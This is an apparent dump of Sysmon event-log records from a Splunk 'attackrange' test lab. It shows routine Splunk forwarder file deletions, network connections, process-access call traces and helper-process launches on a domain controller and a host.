Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26E99702A124B9FC7EA2A373CCAA52BA,SHA256=B7B0A6EDA8FB74A4F408CD5E5E5BAA792D33EBD50EF7493FD4018C6CA2CF0722,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811174Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:47.501{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB885125FCE9FC884B5A64EA5800F124,SHA256=BFFFE760B442D79A0972E3A5666DB041582C3C398F4841A39B1177559C13554B,IMPHASH=00000000000000000000000000000000falsetrue 
354300x80000000000000001055840Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:38.712{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62025-false10.0.1.12-8000- 354300x8000000000000000811173Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:45.306{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57521-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000811175Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:48.532{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3501E773B4F8570BFADB92100D7030E,SHA256=2E3D751783315C2AACEABFB7EA4826E4C445F9DE3CDCE4F5F7E34381351E18B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055843Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:48.488{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D26F8080D556AFC99608594A15403E71,SHA256=12AB7E11AE8EACA404D775E79748779CD1B0466C684E6C40B7E0DEA575A2D6D2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055842Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:11:48.025{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000811176Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:49.548{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23482D720A1E280836A29595AB8A073F,SHA256=B3811715641579D8EB04C193BAD2E0DD396DBB7635EBAC3FDC96429BBE09F1D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055844Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:49.525{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FC5E16A9150BA81EE0E6223BC20FAA6,SHA256=395F6C7F810C17BD8A9C6605294BFA591911DB64F9B95F817546151084CBC25F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055862Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.955{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F946-60EB-1A7E-00000000CF01}9568C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055861Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.955{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055860Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:11:50.955{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055859Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.955{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055858Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.955{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F946-60EB-1A7E-00000000CF01}9568C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055857Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.955{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055856Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.955{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F946-60EB-1A7E-00000000CF01}9568C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055855Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.940{466BC892-F946-60EB-1A7E-00000000CF01}9568C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001055854Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.555{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE07EC03CA5222534246BFA9F425C323,SHA256=EA89CE4682A54E2BE0CBFA3F0DEA4FBF5F7859199112164A9F72CD8D90522604,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811177Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:50.548{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE89B6AD1A74239B12DAAB9110FA1771,SHA256=A28E13B750A50857EA07A2A182A4743650AB57F424CB177F2148225975218049,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055853Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.508{466BC892-F946-60EB-197E-00000000CF01}94965780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055852Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.286{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F946-60EB-197E-00000000CF01}9496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055851Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:11:50.271{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055850Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.271{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055849Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:11:50.271{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055848Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.271{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F946-60EB-197E-00000000CF01}9496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055847Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:11:50.271{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055846Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.271{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F946-60EB-197E-00000000CF01}9496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055845Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.256{466BC892-F946-60EB-197E-00000000CF01}9496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001055874Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:51.976{466BC892-F947-60EB-1B7E-00000000CF01}28607772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055873Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:51.638{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F947-60EB-1B7E-00000000CF01}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055872Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:51.638{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055871Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:11:51.638{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055870Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:51.638{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055869Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
